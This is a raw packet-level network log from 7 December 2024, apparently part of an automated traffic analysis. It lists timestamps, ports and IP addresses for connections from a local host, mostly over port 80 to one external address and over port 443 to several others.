Dec 7, 2024 10:51:45.309870958 CET	49817	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.309880972 CET	443	49817	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.311486959 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311490059 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311496019 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.311522961 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.311585903 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311587095 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311716080 CET	49818	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311726093 CET	443	49818	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.311846972 CET	49819	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.311860085 CET	443	49819	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.321715117 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.321784019 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.321974993 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.321974993 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.322067976 CET	49814	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.322082996 CET	443	49814	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.324275970 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.324307919 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.324500084 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.324645042 CET	49820	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:45.324656010 CET	443	49820	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:45.560904026 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:45.561058998 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:45.561692953 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:45.561820984 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:45.567152977 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:45.567152977 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:45.567174911 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:45.567187071 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:45.567501068 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:45.567636013 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:45.739023924 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:45.858830929 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.002701998 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:46.002774954 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:46.002866983 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:46.011461973 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:46.011507988 CET	443	49815	150.171.28.10	192.168.2.6
Dec 7, 2024 10:51:46.011524916 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:46.011554003 CET	49815	443	192.168.2.6	150.171.28.10
Dec 7, 2024 10:51:46.058283091 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:46.058334112 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:46.058562994 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:46.059211969 CET	49821	443	192.168.2.6	20.223.36.55
Dec 7, 2024 10:51:46.059233904 CET	443	49821	20.223.36.55	192.168.2.6
Dec 7, 2024 10:51:46.181925058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.181984901 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.181997061 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182002068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182060003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182060003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182130098 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182176113 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182209015 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182219982 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182230949 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182246923 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182251930 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182265043 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182298899 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.182444096 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.182566881 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.184876919 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:46.184932947 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:46.185009956 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:46.185600996 CET	49822	443	192.168.2.6	23.206.197.33
Dec 7, 2024 10:51:46.185615063 CET	443	49822	23.206.197.33	192.168.2.6
Dec 7, 2024 10:51:46.190272093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.190342903 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.190347910 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.190387011 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.302077055 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.302143097 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.374113083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.374154091 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.374200106 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.374234915 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.378103971 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.378117085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.378155947 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.386351109 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.386406898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.386414051 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.386444092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.394520998 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.394562006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.394571066 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.394593954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.402652979 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.402712107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.402726889 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.402762890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.410818100 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.410835981 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.410888910 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.418931961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.418991089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.419034004 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.419152021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.427073956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.427138090 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.427169085 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.427232981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.435292006 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.435353994 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.435379982 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.435415983 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.443458080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.443530083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.443536043 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.443587065 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.451152086 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.451229095 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.451301098 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.458731890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.458852053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.566286087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.566351891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.566414118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.568741083 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.568779945 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.568794966 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.568814993 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.573803902 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.573887110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.573901892 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.573926926 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.578717947 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.578773975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.578804016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.578845024 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.583652973 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.583710909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.583790064 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.583830118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.588413000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.588444948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.588493109 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.593172073 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.593225956 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.593230963 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.593259096 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.597923040 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.597966909 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.597987890 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.598014116 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.602633953 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.602686882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.602727890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.602768898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.607496977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.607549906 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.607573986 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.607636929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.612107038 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.612169981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.612207890 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.612246990 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.616837025 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.616869926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.616895914 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.616925001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.621586084 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.621617079 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.621665001 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.621718884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.626358032 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.626411915 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.626437902 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.626477003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.631112099 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.631145954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.631210089 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.631234884 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.635916948 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.635992050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.636049986 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.640517950 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.640577078 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.640583038 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.640615940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.645318985 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.645390034 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.645450115 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.645890951 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.650032997 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.650141001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.650187969 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.650237083 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.654835939 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.654941082 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.655038118 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.659514904 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.659555912 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.659579039 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.659600973 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.758083105 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.758222103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.758269072 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.758384943 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.760087013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.760127068 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.760188103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.763006926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.763077021 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.763137102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.763308048 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.767030001 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.767133951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.767249107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.767249107 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.770772934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.770824909 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.770848036 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.770884037 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.774889946 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.774981022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.775006056 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.775047064 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.778119087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.778168917 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.778234005 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.778400898 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.781661987 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.781723976 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.781779051 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.781815052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.785218954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.785332918 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.785403013 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.785443068 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.788640976 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.788727045 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.788793087 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.788834095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.791948080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.791994095 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.792036057 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.792074919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.795309067 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.795511961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.795516968 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.795547009 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.798666000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.798727036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.798789978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.798831940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.802054882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.802124977 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.802125931 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.802174091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.805393934 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.805447102 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.805483103 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.805504084 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.808743000 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.808794022 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.808836937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.808877945 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.812114954 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.812171936 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.812207937 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.812251091 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.815422058 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.815485954 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.815579891 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.815628052 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.818706989 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.818795919 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.818826914 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.818881035 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.822046041 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.822211981 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.930547953 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:46.931243896 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:46.931282043 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:46.931931019 CET	49816	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:46.931941986 CET	443	49816	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:46.965303898 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.965342999 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.965388060 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.965432882 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.966789961 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.966856956 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.966876030 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.966911077 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.969039917 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.969089985 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.969100952 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.969134092 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.971900940 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.972002029 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.972026110 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.972059965 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.974865913 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.974956036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.975006104 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.975042105 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.977772951 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.977827072 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.977906942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.977941036 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.980700016 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.980791092 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.980792046 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.980825901 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.983601093 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.983675003 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.983726978 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.983766079 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.986576080 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.986603022 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.986660004 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.989481926 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.989568949 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.989680052 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.989723921 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.992494106 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.992549896 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.992594957 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.995341063 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.995395899 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.995439053 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.995460033 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.998162031 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.998212099 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:46.998271942 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:46.998305082 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.001108885 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.001157999 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.001211882 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.001245975 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.004075050 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.004133940 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.004157066 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.004195929 CET	49808	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:47.006974936 CET	80	49808	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:47.007028103 CET	49808	80	192.168.2.6	185.215.113.206
